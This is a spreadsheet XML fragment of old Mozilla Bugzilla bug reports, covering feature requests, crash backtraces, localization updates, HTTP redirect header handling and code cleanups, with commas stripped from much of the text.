    <t>Enable push-to-try for the comm-central try server</t>
  </si>
  <si>
    <t>I might have used the patch-upload method for the mozilla-central try server once can't really remember. The push-to-try method however I use every single time I'm going to push a checkin-needed patch for someone else every single time I think I should be sure a patch works on more than just whichever OS I'm currently on and every single time I don't feel like sitting through running tests myself. No matter how small the difference in actual effort the cognitive difference between hg qdiff &gt; ../foopy open a browser try to remember the URL ask on IRC wait load a web page select a cert upload a patch um what did I name it and hg push -f cc-try is *massive*.</t>
  </si>
  <si>
    <t>CORE-350059</t>
  </si>
  <si>
    <t>Allow cairo.h usage in nsSVGUtils.h</t>
  </si>
  <si>
    <t>CTM rework is going to need some utility methods in nsSVGUtils that return cairo_matrix_t structures.  As nsSVGUtils::SVGEnabled() is used in the tree in places were pulling in cairo.h would not be appropriate move that functionality to a global function.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-411496</t>
  </si>
  <si>
    <t>New updates strings for bug 391598</t>
  </si>
  <si>
    <t>bug 391598 introduced some new strings for the updating process those need to be localized for de. patch follows.</t>
  </si>
  <si>
    <t>FIREFOX-462674</t>
  </si>
  <si>
    <t>autocomplete for all existing about: URIs after typing about:</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3
Build Identifier: Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3
It would be really nice to have about: completion for the address bar currently finding the possible options is hard since they are undocumented in the interface.
If you want to find a specific about: page but do not know the exact name its hard to locate it.
Reproducible: Always
Steps to Reproduce:
1. type about: in the address bar
2. notice you do not know the precise name for the plugins name
3. go onto the web and try to formulate a search query which helps you out without knowing the name of the page you are looking for
Expected Results:  
Type about: in the address bar and have a list of the available pages</t>
  </si>
  <si>
    <t>nicolaso</t>
  </si>
  <si>
    <t>janklopper</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-332461</t>
  </si>
  <si>
    <t>creation of a da-dk@localization.bugs meta-account</t>
  </si>
  <si>
    <t>It would be nice to have one (unique) account to listen to for bugs filed in Mozilla Localizations -&gt; da-DK / Danish
The current QA is (afaik) a member of the Seamonkey group ... the other groups (Firefox Thunderbird) aren't notified when new bugs arrive in this component - that is - not until someone puts us on the CC list....
therefore - it would be good to listen to one unique account for the entire component - and then act out on those bugs that belong to ones product...</t>
  </si>
  <si>
    <t>sskroeder</t>
  </si>
  <si>
    <t>CORE-161481</t>
  </si>
  <si>
    <t>Page source rendering terribly slow</t>
  </si>
  <si>
    <t>Since yesterday (perhaps two or three builds before...) the page source
rendering is terribly slow.
Mozilla 1.1b
Mozilla/5.0 (Macintosh U PPC en-US rv:1.1b) Gecko/2002080703
Mac8.6</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-190747</t>
  </si>
  <si>
    <t>chatzilla shouldn't open a window until the server sends a JOIN</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2) Gecko/20021126
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2) Gecko/20021126
ChatZilla currently opens a window only when a user issues a /join command
ChatZilla should really only open the window when it recieves a JOIN command
from the server for itself.  This is because the server may send unsolicited
JOINs or perhaps JOIN's that the IRC client wasn't expecting eg: /join #[Foo]
and getting back :IRCMonkey JOIN #{foo} instead.
Reproducible: Always
Steps to Reproduce:
1. join a channel
2. note the window opens before the IRC server responds
Actual Results:  
uh channel window opened before the IRC server responds
Expected Results:  
Mozilla should have waited until the JOIN command came back from the IRC server.
 Optionally displaying a message such as *** Joining #[Foo] somewhere to give
the user some feedback that the command is in progress.
I believe that this is important for the ongoing archetectual stability of
Chatzilla. :)</t>
  </si>
  <si>
    <t>rginda</t>
  </si>
  <si>
    <t>isomer</t>
  </si>
  <si>
    <t>CORE-449323</t>
  </si>
  <si>
    <t>move SVG effect properties to nsSVGEffects</t>
  </si>
  <si>
    <t>This is just a cleanup step to separate some stuff out of nsSVGUtils. We also need to make the properties accessible via nsSVGEffects.h so that future code in nsSVGIntegrationUtils can use them.</t>
  </si>
  <si>
    <t>CORE-111598</t>
  </si>
  <si>
    <t>nsIObserverService::AddObserver doc comment is wrong</t>
  </si>
  <si>
    <t>nsIObserverService::AddObserver says:
     * @param ownsWeak  : If set to false the nsIObserverService will hold a 
     *                    strong reference to |anObserver|.  If set to false and 
     *                    |anObserver| supports the nsIWeakReference interface
     *                    a weak reference will be held.  Otherwise an error will be
     *                    returned.
The second 'false' needs to be a 'true'.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-353859</t>
  </si>
  <si>
    <t>Update printdialog.properties</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-931470</t>
  </si>
  <si>
    <t>Duplicated Bugzilla account needs to be deleted</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #931126 +++
I have one active bugzilla account (bugzilla@planet.nl) but i noticed that there are 2 others active (tim_maks@planet.nl and thunderbird_nl@planet.nl) i am in a process to remove the thunderbird_nl acount from my mailaccount. 
can you please remove the two obselete accounts so people finf me with the right account?</t>
  </si>
  <si>
    <t>ashish</t>
  </si>
  <si>
    <t>BUGZILLA-135543</t>
  </si>
  <si>
    <t>@Support::Templates::testitems does not list all templates</t>
  </si>
  <si>
    <t>The @Support::Templates::testitems module variable does not
list every template stored under the templates/default/
directory.  The Support::Templates module should probably
use a glob to pick up all of the files rather than pattern-
matching through perl scripts.
I will attach a patch to t/004template.t that demostrates
this by checking for version strings in all template files
using a glob() instead of @Support::Templates::testitems.
The following templates were found not to have version
strings (I'll open another bug for this later):
buglist/buglist-rdf.rdf.tmpl
buglist/buglist-simple.html.tmpl
buglist/buglist.html.tmpl
buglist/change-form.tmpl
buglist/table.tmpl
prefs/account.tmpl
prefs/email.tmpl
prefs/footer.tmpl
prefs/permissions.tmpl
show/navigate.html.tmpl</t>
  </si>
  <si>
    <t>FIREFOX-384667</t>
  </si>
  <si>
    <t>AT-SPI events not generated for all Firefox progress bars</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Launch Accerciser and turn event monitoring on.
2. Launch Firefox and begin the download of a file (e.g. a nightly build of Firefox).
Expected results:  Events would be generated for changes to the progress bar in the Downloads window.
Actual results:  Events are generated only for the changes to the Downloads window's title bar:
    object:property-change:accessible-name(0 0 55% of 1 file - Downloads)
	    source: [frame | 55% of 1 file - Downloads]
    	    application: [application | Minefield]
    object:visible-data-changed(0 0 None)
	    source: [frame | 55% of 1 file - Downloads]
	    application: [application | Minefield]
Notes:
1. We are getting events for other XUL progress bars.  For instance when downloading the latest update to Firefox or checking for mail in Thunderbird we get object:property-change:accessible-value events e.g.:
    object:property-change:accessible-value(0 0 None)
            source: [progress bar | ]
            application: [application | Thunderbird]
2. This bug also seems to be present with the progress bar that is contained within the Firefox status bar and displayed when a page loads.  However it is NOT present with all Firefox progress bars (e.g. the progress bar in the add-ons dialog that appears when you press the Find Updates button)
3. This does not seem to be a regression.  I spot-checked a number of builds between 2/28 and the present.</t>
  </si>
  <si>
    <t>evan.yan</t>
  </si>
  <si>
    <t>CORE-157485</t>
  </si>
  <si>
    <t>Disability Access APIs</t>
  </si>
  <si>
    <t>Implement nsIAccessibleText for nsHTMLTextFieldAccessible</t>
  </si>
  <si>
    <t>Every object that support nsIAccessibleEditableText must support 
nsIAccessibleText too.</t>
  </si>
  <si>
    <t>yuanyi21</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-109481</t>
  </si>
  <si>
    <t>Easy way to pick open pages (as opposed to open windows)</t>
  </si>
  <si>
    <t>I suspect the main use of DOM Inspector will be to inspect web pages and open
ones at that. Therefore on the file menu there should be a way to select web
pages in any open tabs or windows.</t>
  </si>
  <si>
    <t>jason.barnabe</t>
  </si>
  <si>
    <t>CORE-313398</t>
  </si>
  <si>
    <t>Unoptimized Intel Mac debug build crashes with a misaligned stack</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X en) AppleWebKit/417.2 (KHTML like Gecko) Safari/417.1
Build Identifier: Trunk
On build 8F1099 of Mac OS X on Intel an unoptimized debug build of Firefox crashes on launch in 
XPTC_InvokeByIndex with a misaligned stack.  The misalignment happens within XPTC_InvokeByIndex 
itself which doesn't appear to be properly aligning the first call in the inline asm.
Program received signal EXC_BAD_INSTRUCTION Illegal instruction/operand.
0x8fe12ee4 in __dyld_stub_binding_helper_interface ()
2: /x $esp = 0xbfffd8b8
1: x/i $pc  0x8fe12ee4 :       movdqa %xmm032(%esp)
(gdb) bt
#0  0x8fe12ee4 in __dyld_stub_binding_helper_interface ()
#1  0x01008000 in ?? ()
#2  0x0108e45d in XPTC_InvokeByIndex (that=0x1c3b690 methodIndex=3 paramCount=1 
params=0xbfffdb4c) at xptcinvoke_unixish_x86.cpp:147
#3  0x2b1bf00f in XPCWrappedNative::CallMethod (ccx=@0xbfffdd74 mode=CALL_GETTER) at 
xpcwrappednative.cpp:2139
#4  0x2b1e6297 in XPCWrappedNative::GetAttribute (ccx=@0xbfffdd74) at xpcwrappednativejsops.cpp:
1925
#5  0x2b1c6263 in XPC_WN_GetterSetter (cx=0x1c32280 obj=0x204b068 argc=0 argv=0x1c439c8 
vp=0xbfffdec4) at xpcwrappednativejsops.cpp:1476
#6  0x0054da41 in js_Invoke (cx=0x1c32280 argc=0 flags=2) at jsinterp.c:1177
#7  0x0054de69 in js_InternalInvoke (cx=0x1c32280 obj=0x204b068 fval=33862752 flags=0 
argc=0 argv=0x0 rval=0xbfffe9bc) at jsinterp.c:1274
#8  0x0054e149 in js_InternalGetOrSet (cx=0x1c32280 obj=0x204b068 id=29580784 
fval=33862752 mode=JSACC_READ argc=0 argv=0x0 rval=0xbfffe9bc) at jsinterp.c:1317
#9  0x0057a70e in js_GetProperty (cx=0x1c32280 obj=0x204b068 id=29580784 vp=0xbfffe9bc) at 
jsobj.c:2931
#10 0x0055e1a0 in js_Interpret (cx=0x1c32280 pc=0x1c434ad 5 result=0xbfffed80) at jsinterp.c:
3327
#11 0x0054e526 in js_Execute (cx=0x1c32280 chain=0x204af98 script=0x1c43450 down=0x0 
flags=0 result=0xbfffef10) at jsinterp.c:1407
#12 0x00512e20 in JS_ExecuteScript (cx=0x1c32280 obj=0x204af98 script=0x1c43450 
rval=0xbfffef10) at jsapi.c:4009
#13 0x2b1d35a2 in mozJSComponentLoader::GlobalForLocation (this=0x1c314d0 
aLocation=0x1c30f60 rel:jsconsole-clhandler.js aComponent=0x1c31600 aGlobal=0xbffff090) at 
mozJSComponentLoader.cpp:1567
#14 0x2b1d3803 in mozJSComponentLoader::ModuleForLocation (this=0x1c314d0 
registryLocation=0x1c30f60 rel:jsconsole-clhandler.js component=0x1c31600 status=&lt;incomplete 
type&gt;) at mozJSComponentLoader.cpp:917
#15 0x2b1d42be in mozJSComponentLoader::AttemptRegistration (this=0x1c314d0 
component=0x1c31600 deferred=0) at mozJSComponentLoader.cpp:755
#16 0x2b1d488b in mozJSComponentLoader::AutoRegisterComponent (this=0x1c314d0 when=0 
component=0x1c31600 registered=0xbffff304) at mozJSComponentLoader.cpp:682
#17 0x2b1d11f2 in mozJSComponentLoader::RegisterComponentsInDir (this=0x1c314d0 when=0 
dir=0x1c0e110) at mozJSComponentLoader.cpp:590
#18 0x2b1d128b in mozJSComponentLoader::AutoRegisterComponents (this=0x1c314d0 when=0 
aDirectory=0x1c0e110) at mozJSComponentLoader.cpp:546
#19 0x01062178 in nsComponentManagerImpl::AutoRegisterNonNativeComponents (this=0x1c0c910 
spec=0x1c0e110) at nsComponentManager.cpp:3262
#20 0x010647cf in nsComponentManagerImpl::AutoRegisterImpl (this=0x1c0c910 when=0 
inDirSpec=0x0 fileIsCompDir=1) at nsComponentManager.cpp:3232
#21 0x01064882 in nsComponentManagerImpl::AutoRegister (this=0x1c0c910 aSpec=0x0) at 
nsComponentManager.cpp:3404
#22 0x01010d3c in NS_InitXPCOM3_P (result=0xbffff738 binDirectory=0x1c0c3a0 
appFileLocationProvider=0xbffff768 staticComponents=0x54ab0 componentCount=1) at 
nsXPComInit.cpp:616
#23 0x00003433 in ScopedXPCOMStartup::Initialize (this=0xbffff738) at nsAppRunner.cpp:595
#24 0x00009259 in XRE_main (argc=1 argv=0xbffff8d4 aAppData=0x549e0) at nsAppRunner.cpp:
2141
#25 0x000024aa in main (argc=1 argv=0xbffff8d4) at nsBrowserApp.cpp:61
(gdb) 
Reproducible: Always
Steps to Reproduce:
1) Build Firefox with --disable-optimize --enable-debug and --disable-tests.
2) Run.
Actual Results:  
Firefox crashes.
Expected Results:  
Not crashing is often considered to be proper behavior.</t>
  </si>
  <si>
    <t>CORE-338679</t>
  </si>
  <si>
    <t>DOM: Events</t>
  </si>
  <si>
    <t>DOMAttrModified event reports new value as prevValue for style changes</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.9a1) Gecko/20060517 Minefield/3.0a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.9a1) Gecko/20060517 Minefield/3.0a1
If the DOMAttrModified event is fired because of a change to its style object event.prevValue isn't the old style value but the same as event.newValue. 
The attached testcase only tests width but as far as I can tell all style properties are affected.
If the style is modified via setAttribute(style newValue) instead then prevValue is reported correctly.
Reproducible: Always</t>
  </si>
  <si>
    <t>Seno.Aiko</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-424362</t>
  </si>
  <si>
    <t>Tune down memcache on addons.mozilla.org</t>
  </si>
  <si>
    <t>Hey guys. Lots of add-ons updated on March 20th are having corrupt hash issues upon download. See bug 424339.
We've been trying to diagnose the issue in bug 422562. However this is nasty enough now that we need to expire existing caches and turn down the overall cache time period. I think it is at 2hrs now and it should only be 1 min. 
It was originally turned up to 2hrs when services and addons were the same host. Now they have been split up -- so services can have the long cache -- and addons can have the short one.</t>
  </si>
  <si>
    <t>CORE-179956</t>
  </si>
  <si>
    <t>Parser and editor should agree on blockness of captions</t>
  </si>
  <si>
    <t>when I start the composer in a debug build
insert a table and then create a caption I see a bunch of assertions like:
###!!! ASSERTION: Parser and editor disagree on blockness: caption: '*aIsBlock'
 file c:/moz_sour/mozilla/mozilla/editor/libeditor/html/nsHTMLEditor.cpp line 5
75
It would be cool if you could fix this because this popups make it quite
difficult to investigate bug 105467</t>
  </si>
  <si>
    <t>Ms2ger</t>
  </si>
  <si>
    <t>bernd_mozilla</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-433882</t>
  </si>
  <si>
    <t>remove unnecessary releng code from mozilla-central &amp; actionmonkey</t>
  </si>
  <si>
    <t>There's some release engineering code in mozilla-central and actionmonkey that isn't necessary for building/updating and shouldn't be there. Namely:
tools/patcher and tools/release
We're almost certainly going to be working out of CVS for the time being and as I understand it we won't be syncing from CVS -&gt; HG very soon. We should remove these modules to avoid confusion and code drift.
At some point we should consider moving this code to a repository under http://hg.mozilla.org/build but for now let's leave it where it is.</t>
  </si>
  <si>
    <t>CORE-447660</t>
  </si>
  <si>
    <t>Reenable float breaking in columns</t>
  </si>
  <si>
    <t>We turned this off in bug 413048. One day when it's safe to turn it on again we should probably do so.</t>
  </si>
  <si>
    <t>mats</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-525035</t>
  </si>
  <si>
    <t>Import button on Open panel for file-based bookmarks import is not localizable</t>
  </si>
  <si>
    <t>Created attachment 408897
Use a localizable string
Igor reported that that Import button in the Open panel that you get when choosing a file for bookmarks import is not localizable.  Indeed it's not.
This patch fixes that (with a ImportPanelButton key to help keep us from confusing it from the Import button in the nib) and it also moves all of the bookmarks import/export/opening localizable strings to be adjacent to each other rather than in two hunks at opposite ends of the file.
l10n is considering doing this string for 2.0.1 if we do bug 521137 so flagging for 2.0.1 until there's a decision.</t>
  </si>
  <si>
    <t>CORE-456435</t>
  </si>
  <si>
    <t>get rid of unix stat cache</t>
  </si>
  <si>
    <t>This is part of bug 307815 we don't have to remove stat caches for all platforms at the same time. Our current stat caches are fundamentally flawed we should remove them.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-371325</t>
  </si>
  <si>
    <t>Automate dependent tool config file generation</t>
  </si>
  <si>
    <t>Items in our central config found at /tools/release/bootstrap.cfg should be automatically propagated to dependent tool configs.
As a part of the process care should be taken to check these new configs into some sort of source control to allow us to manage them systematically and see changesets.
Tools that would need to be configured as a part of release automation based on boostrap.cfg are:
patcher
tinderbox
bouncer
addons.mozilla.org
patcher
Others... ?</t>
  </si>
  <si>
    <t>CORE-289209</t>
  </si>
  <si>
    <t>[FIXr]Move BindToTree calls into SetRootContent</t>
  </si>
  <si>
    <t>See bug 286000 comment 14.  This is a bug to do that per bug 286000 comment 17.</t>
  </si>
  <si>
    <t>CORE-268798</t>
  </si>
  <si>
    <t>not flushing session cache during a memory-pressure notification</t>
  </si>
  <si>
    <t>For whatever reason we only purge the chrome cache.</t>
  </si>
  <si>
    <t>CORE-474443</t>
  </si>
  <si>
    <t>TM: Implement oracle-based speculative fmod/fdiv/fmul demotion</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.5) Gecko/2008121622 Fedora/3.0.5-1.fc9 Firefox/3.0.5
Build Identifier: 
Right now tracemonkey generates a call to js_imod. For example
for(var i = 0 i &lt; 3 ++i) { 5 % i }
Generates the following assembly:
              mov -4(ebp)ecx                 ecx(state)
              mov eaxecx                     ecx(state)
              mov edi0(eax)                  eax(state)
              mov ebx12(eax)                 eax(state) edi(sp)
              mov -8(ebp)ebx                 eax(state) ebx(cx) edi(sp)
              mov esi8(eax)                  eax(state) edi(sp)
              mov ebx648(esi)                esi(gp) edi(sp)
              mov 0(edi)5                    ebx(ld1) esi(gp) edi(sp)
              mov 8(edi)ebx                  ebx(ld1) esi(gp) edi(sp)
              mov edxebx                     ebx(ld1) esi(gp) edi(sp)
              mov ecx5                       ebx(ld1) esi(gp) edi(sp)
              call js_imod                    ebx(ld1) esi(gp) edi(sp)
              mov edxeax                     eax(js_imod1) ebx(ld1) esi(gp) edi(sp)
              cmp edx-1                      edx(js_imod1) ebx(ld1) esi(gp) edi(sp)
              je 0x113f85                     edx(js_imod1) ebx(ld1) esi(gp) edi(sp)
However gcc generates the following code for 
int foo(int a int b) {
    return a % b
}
 8048480:       55                      push   %ebp
 8048481:       89 e5                   mov    %esp%ebp
 8048483:       8b 55 08                mov    0x8(%ebp)%edx
 8048486:       89 d0                   mov    %edx%eax
 8048488:       c1 fa 1f                sar    $0x1f%edx
 804848b:       f7 7d 0c                idivl  0xc(%ebp)
 804848e:       5d                      pop    %ebp
 804848f:       89 d0                   mov    %edx%eax
 8048491:       c3                      ret    
This gives the same result (for positive and negative values of both operands) as the Javascript modulus. Tracemonkey should use idiv.
Reproducible: Always</t>
  </si>
  <si>
    <t>gal</t>
  </si>
  <si>
    <t>BUGZILLA-201018</t>
  </si>
  <si>
    <t>Creating/Changing Bugs</t>
  </si>
  <si>
    <t>editusers.cgi never calls DeriveGroup prior to changing a bug</t>
  </si>
  <si>
    <t>This means if you edit a user's groups and they have privileges which are
inherited from a group you changed those privilege changes aren't taken into
account.
I fixed this on Zippy's install by calling DeriveGroup from editusers after
changing the user's groups.  Patch coming</t>
  </si>
  <si>
    <t>CORE-97677</t>
  </si>
  <si>
    <t>Need API to check whether a URI exists</t>
  </si>
  <si>
    <t>For editor link checking we need an API to check whether a URI is valid or not
(which usually means actually trying to open the file do an http head request
etc as appropriate for the scheme).  Darin and bbaetz have helped me with JS
code to open URIs asynchronously and check but it's error prone and we all
agree that this logic really belongs in netlib instead of the editor since
netlib will be a lot smarter about interpreting the various http status codes.</t>
  </si>
  <si>
    <t>CORE-159108</t>
  </si>
  <si>
    <t>Layout: Tables</t>
  </si>
  <si>
    <t>border-collapse: collapse. table borders should be reported as overflow</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.1b) Gecko/20020722
BuildID:    2002072204
On the test page the border on the top and left sides of the table disappears.
It actually appears as if the border disappears halfway in under the
content/background och the cells. If the border is 4px wide 2 pixels will be
visible at all sides of the table. If the border is 2px wide 1 pixel will be
visible at all sides etc. 1 pixel obviously becomes either 1 or 0 pixels.
Without border-collapse: collapse everything works as expected.
Reproducible: Always
Steps to Reproduce:
1. Load the test page.
2. Look at the borders around the table.
Actual Results:  The border is invisible (or width: &lt; 1px) on the top and left
sides.
Expected Results:  There should be 1px borders on all sides.</t>
  </si>
  <si>
    <t>mavos</t>
  </si>
  <si>
    <t>CALENDAR-462326</t>
  </si>
  <si>
    <t>Thunderbird with Lightning leaks on Shutdown.</t>
  </si>
  <si>
    <t>Created attachment 345473
Leak Log
Thunderbird is just about to have leak and bloat boxes on trunk. At the moment these will definitely go orange due to reference count shutdown leaks within Lightning. These do not occur when just Thunderbird is running.
As when we integrate Thunderbird + Lightning on the builds this will make the tinderboxes go orange I think we should try and fix these.
These occur with a basic profile (no calendars defined on startup) and without actually opening a calendar tab.
More information on the profile and how to run the tests can be found here:
https://wiki.mozilla.org/MailNews:Memory_Bloat_and_Leak_Tests
We may need to investigate trace-malloc leaks as well but seeing as they will be affected by these then I suggest we clear these off first.
There may be some related bugs e.g. Bug 426973 - Sunbird leaking on shutdown but I wanted one specifically for tracking what would block Lightning integrating with TB.
If you need help investigating let me know.</t>
  </si>
  <si>
    <t>dbo.moz</t>
  </si>
  <si>
    <t>CORE-507991</t>
  </si>
  <si>
    <t>Crash [@ nsSprocketLayout::PopulateBoxSizes] with object and position:absoluteoverflow:scroll in binding</t>
  </si>
  <si>
    <t>Created attachment 392225
testcase
I guess this might be related to bug 397596 no idea.
But since this has a different regression range I'm filing this as a new bug.
See testcase which crashes current trunk build (after hanging for a short while).
This seems to have regressed between 2009-05-19 and 2009-05-20:
http://hg.mozilla.org/mozilla-central/pushloghtml?startdate=2009-05-19+04%3A00%3A00&amp;enddate=2009-05-20+09%3A00%3A00
http://crash-stats.mozilla.com/report/index/fdc0c72f-7bc3-47ed-a9f4-a013c2090803?p=1
0  	xul.dll  	nsSprocketLayout::PopulateBoxSizes  	 layout/xul/base/src/nsSprocketLayout.cpp:928
1 	xul.dll 	nsSprocketLayout::Layout 	layout/xul/base/src/nsSprocketLayout.cpp:249
2 	xul.dll 	nsBoxFrame::DoLayout 	layout/xul/base/src/nsBoxFrame.cpp:936
3 	xul.dll 	nsIFrame::Layout 	layout/xul/base/src/nsBox.cpp:543
4 	xul.dll 	nsSprocketLayout::Layout 	layout/xul/base/src/nsSprocketLayout.cpp:523
5 	xul.dll 	nsBoxFrame::DoLayout 	layout/xul/base/src/nsBoxFrame.cpp:936
6 	xul.dll 	nsBoxFrame::LayoutChildAt 	layout/xul/base/src/nsBoxFrame.cpp:2075
7 	xul.dll 	LayoutAndInvalidate 	layout/generic/nsGfxScrollFrame.cpp:2474
8 	xul.dll 	nsGfxScrollFrameInner::LayoutScrollbars 	layout/generic/nsGfxScrollFrame.cpp:2527
9 	xul.dll 	nsHTMLScrollFrame::Reflow 	layout/generic/nsGfxScrollFrame.cpp:871
10 	xul.dll 	xul.dll@0x3bb6fe</t>
  </si>
  <si>
    <t>tnikkel</t>
  </si>
  <si>
    <t>CORE-58539</t>
  </si>
  <si>
    <t>window.scrollbars.visible -&gt; ns_error_failure 0x80004005</t>
  </si>
  <si>
    <t>Trying to access window.scrollbars.visible gives a NS_ERROR_FAILURE.  It's 
supposed to return a boolean although I'm not sure when it's true and when 
it's false.
Confusing 4.x documentation:
http://developer.netscape.com/docs/manuals/communicator/jsref/win1.htm#1187502</t>
  </si>
  <si>
    <t>danm.moz</t>
  </si>
  <si>
    <t>CORE-280454</t>
  </si>
  <si>
    <t>Adjust svg cairo renderer to handle cairo &gt; 0.3.0</t>
  </si>
  <si>
    <t>Font selection needs to change due to cairo API behavior change.</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG-915031</t>
  </si>
  <si>
    <t>Design</t>
  </si>
  <si>
    <t>[Redesign] The contributor list is too flashy</t>
  </si>
  <si>
    <t>What did you do?
================
Visit any MDN wiki page
What happened?
==============
There is a list of contributors at the bottom of the page
What should have happened?
==========================
The list should be less flashy.
Is there anything else we should know?
======================================
Possible solution: to lower the opacity of the whole line
Possible solution2: to lower the font size.
(More possible solutions are surely existing :-) )</t>
  </si>
  <si>
    <t>jypenator</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-378041</t>
  </si>
  <si>
    <t>Need www.mozilla.com synched for addition of Thunderbird 2.0.0.0 Solaris builds in release notes</t>
  </si>
  <si>
    <t>Uploaded Solaris builds of Thunderbird 2.0.0.0 on the ftp server and
updated following webpages on the stage server as well need to push it out
sen-US/thunderbird/2.0.0.0/releasenotes/index.html
thanks
Dave Lin</t>
  </si>
  <si>
    <t>dave.lin</t>
  </si>
  <si>
    <t>CORE-401564</t>
  </si>
  <si>
    <t>Networking: HTTP</t>
  </si>
  <si>
    <t>HTTP ACCEPT header not preserved after GET redirect (HTTP 302 HTTP 303 HTTP 307)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8
The HTTP ACCEPT header is not preserved when after a GET redirect. That leads that the second GET is not using the original HTTP ACCEPT header but is reset to the standard.
This is a really important feature for the proper implementation of RESTful architectures. I'm currently developing some RESTful prototypes and this feature is a must when dealing with aliasing of resources for instance in order to access resources by their ID or any other resource key field (as its unique name). The problem is that the http accept header in particular is very important to determine the proper format to de-reference to the resource to (as when using Ruby on Rails respond_to in order to determine the content-type to respond with).
Reproducible: Always
Steps to Reproduce:
http://localhost:3034/elements/ApplicantDetails
GET /elements/ApplicantDetails HTTP/1.1
Host: localhost:3034
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8
Accept: application/json
Accept-Language: en-gbes-esq=0.7enq=0.3
Accept-Encoding: gzipdeflate
Accept-Charset: ISO-8859-1utf-8q=0.7*q=0.7
Keep-Alive: 300
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0
Referer: http://localhost:3034/elements/
Cookie: _XMLDictionaryREST_session_id=BAh7CDoOcmV0dXJuX3RvIg8vZWxlbWVudHMvOgtsb2NhbGUiCmVuLWdiIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsA--3392c9915ea7c440fd48aca0423dedd0e26f5595
HTTP/1.x 302 Moved Temporarily
Content-Length: 99
Connection: close
Date: Mon 29 Oct 2007 14:55:47 GMT
Status: 302 Found
Location: http://localhost:3034/elements/96
X-Runtime: 0.01500
Cache-Control: no-cache
Server: Mongrel 0.3.13.3
Content-Type: text/html charset=utf-8
----------------------------------------------------------
http://localhost:3034/elements/96
GET /elements/96 HTTP/1.1
Host: localhost:3034
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8
Accept: text/xmlapplication/xmlapplication/xhtml+xmltext/htmlq=0.9text/plainq=0.8image/png*/*q=0.5
Accept-Language: en-gbes-esq=0.7enq=0.3
Accept-Encoding: gzipdeflate
Accept-Charset: ISO-8859-1utf-8q=0.7*q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost:3034/elements/
Cookie: _XMLDictionaryREST_session_id=BAh7CDoOcmV0dXJuX3RvIg8vZWxlbWVudHMvOgtsb2NhbGUiCmVuLWdiIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsA--3392c9915ea7c440fd48aca0423dedd0e26f5595</t>
  </si>
  <si>
    <t>scott.gregory.west</t>
  </si>
  <si>
    <t>anicola.bugzilla</t>
  </si>
  <si>
    <t>CORE-307382</t>
  </si>
  <si>
    <t>Security: CAPS</t>
  </si>
  <si>
    <t>[FIX]Remove support for security.checkloaduri = false</t>
  </si>
  <si>
    <t>People keep doing this and it's frankly a poor decision every way round. We now
have the ability to disable checkloaduri per-site so let's get rid of the
terrible global pref.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-306613</t>
  </si>
  <si>
    <t>Can't add pref via about:config / about:config contextual menu missing</t>
  </si>
  <si>
    <t>In Fx you can ctrl-click on an about:config entry and get a contextual menu
which allows you to create a new pref (for instance to add
permissions.default.script which does not exist by default) to lock a given
setting to reset a setting to modify a setting to toggle a setting copy name
or copy value.  (The latter four seem somewhat superfluous esp. as double-click
already toggles or modifies depending on the pref type.)  Camino shows the page
contextual menu instead.
These are useful (esp for QA!) and allow modifications and additions without the
quit-edit-restart merry-go-round we currently have in Camino for some prefs.</t>
  </si>
  <si>
    <t>FIREFOX-383987</t>
  </si>
  <si>
    <t>Page Info Window</t>
  </si>
  <si>
    <t>Remove unused functions addRows and endsWith</t>
  </si>
  <si>
    <t>Created attachment 267924
remove addRows and endsWith
addRows http://lxr.mozilla.org/seamonkey/source/browser/base/content/pageinfo/pageInfo.js#95 existed since before the Page Info code was ported from the suite possibly added in bug 52370. As far as I can tell it was never used.
endsWith http://lxr.mozilla.org/seamonkey/source/browser/base/content/pageinfo/security.js#353 was added in bug 377076 and its caller was removed in bug 379239.
